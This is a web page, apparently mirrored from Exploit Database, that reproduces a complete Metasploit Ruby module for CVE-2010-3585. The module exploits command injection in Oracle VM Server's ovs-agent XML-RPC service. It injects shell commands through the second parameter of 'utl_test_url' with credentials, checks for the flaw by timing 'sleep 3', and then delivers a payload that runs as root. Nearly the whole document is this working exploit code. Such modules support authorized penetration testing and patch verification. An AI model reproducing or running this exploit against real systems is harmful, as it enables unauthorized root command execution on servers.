Oracle VM Server Virtual Server Agent – Command Injection (Metasploit)

• Exploit Database
• 103 阅读

• 作者： Metasploit
  日期： 2010-10-25
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/16915/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168

  ## # $Id: oracle_vm_agent_utl.rb 10821 2010-10-25 20:58:49Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Oracle VM Server Virtual Server Agent Command Injection&apos;, &apos;Description&apos;=> %q{ This module exploits a command injection flaw within Oracle\&apos;s VM Server Virtual Server Agent (ovs-agent) service.   By including shell meta characters within the second parameter to the &apos;utl_test_url&apos; XML-RPC methodCall, an attacker can execute arbitrary commands. The service typically runs with root privileges.   NOTE: Valid credentials are required to trigger this vulnerable. The username appears to be hardcoded as &apos;oracle&apos;, but the password is set by the administrator at installation time. }, &apos;Author&apos; => [ &apos;jduck&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 10821 $&apos;, &apos;References&apos; => [ # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585} [&apos;CVE&apos;, &apos;2010-3585&apos;], [&apos;OSVDB&apos;, &apos;68797&apos;], [&apos;BID&apos;, &apos;44047&apos;] ], &apos;Privileged&apos; => true, &apos;Platform&apos; => [&apos;unix&apos;, &apos;linux&apos;], &apos;Arch&apos; => ARCH_CMD, &apos;Payload&apos;=> { &apos;Space&apos; => 512, &apos;BadChars&apos; => &apos;<>&apos;, &apos;DisableNops&apos; => true, &apos;Keys&apos;=> [&apos;cmd&apos;, &apos;cmd_bash&apos;], }, &apos;Targets&apos;=> [ [&apos;Automatic&apos;, { }], ], &apos;DefaultTarget&apos; => 0, &apos;DisclosureDate&apos; => &apos;Oct 12 2010&apos; ))   register_options( [ Opt::RPORT(8899), OptBool.new(&apos;SSL&apos;, [ true, &apos;Use SSL&apos;, true ]), OptString.new(&apos;CMD&apos;, [ false,"A single command to execute instead of the payload" ]), OptString.new(&apos;USERNAME&apos;, [ true,"The user to authenticate as", &apos;oracle&apos;]), OptString.new(&apos;PASSWORD&apos;, [ true,"The password to authenticate with" ]) ], self.class)   deregister_options( &apos;HTTP::junk_params&apos;, # not your typical POST, so don&apos;t inject params. &apos;HTTP::junk_slashes&apos; # For some reason junk_slashes doesn&apos;t always work, so turn that off for now. ) end   def go(command) datastore[&apos;BasicAuthUser&apos;] = datastore[&apos;USERNAME&apos;] datastore[&apos;BasicAuthPass&apos;] = datastore[&apos;PASSWORD&apos;]   xml = <<-EOS <?xml version="1.0"?> <methodCall> <methodName>utl_test_url</methodName> <params><param> <value><string>PARAM1</string></value> </param></params> <params><param> <value><string>PARAM2</string></value> </param></params> <params><param> <value><string>PARAM3</string></value> </param></params> <params><param> <value><string>PARAM4</string></value> </param></params> </methodCall> EOS   sploit = rand_text_alphanumeric(rand(128)+32) sploit << "&apos;;" + command + ";&apos;"   xml.gsub!(/PARAM1/, &apos;http://&apos; + rand_text_alphanumeric(rand(128)+32) + &apos;/&apos;) xml.gsub!(/PARAM2/, sploit) xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32)) xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))   res = send_request_cgi( { &apos;uri&apos;=> &apos;/RPC2&apos;, &apos;method&apos; => &apos;POST&apos;, &apos;ctype&apos;=> &apos;application/xml&apos;, &apos;data&apos; => xml, }, 5)   if not res if not session_created? print_error(&apos;Unable to complete XML-RPC request&apos;) return nil end # no response, but session created!!! return true end   case res.code when 403 print_error(&apos;Authentication failed!&apos;) return nil   when 200 print_good(&apos;Our request was accepted!&apos;) return res   end   print_error("Encountered unexpected #{res.code} reponse:") print_error(res.inspect)   return nil end   def check print_status("Attempting to detect if the server is vulnerable...")   # Try running/timing sleep 3 start = Time.now go(&apos;sleep 3&apos;) elapsed = Time.now - start if elapsed >= 3 and elapsed <= 4 return Exploit::CheckCode::Vulnerable end   return Exploit::CheckCode::Safe end   def exploit print_status("Attempting to execute the payload...")   cmd = datastore[&apos;CMD&apos;] cmd ||= payload.encoded   if not go(cmd) raise RuntimeError, "Unable to execute the desired command" end   handler end   end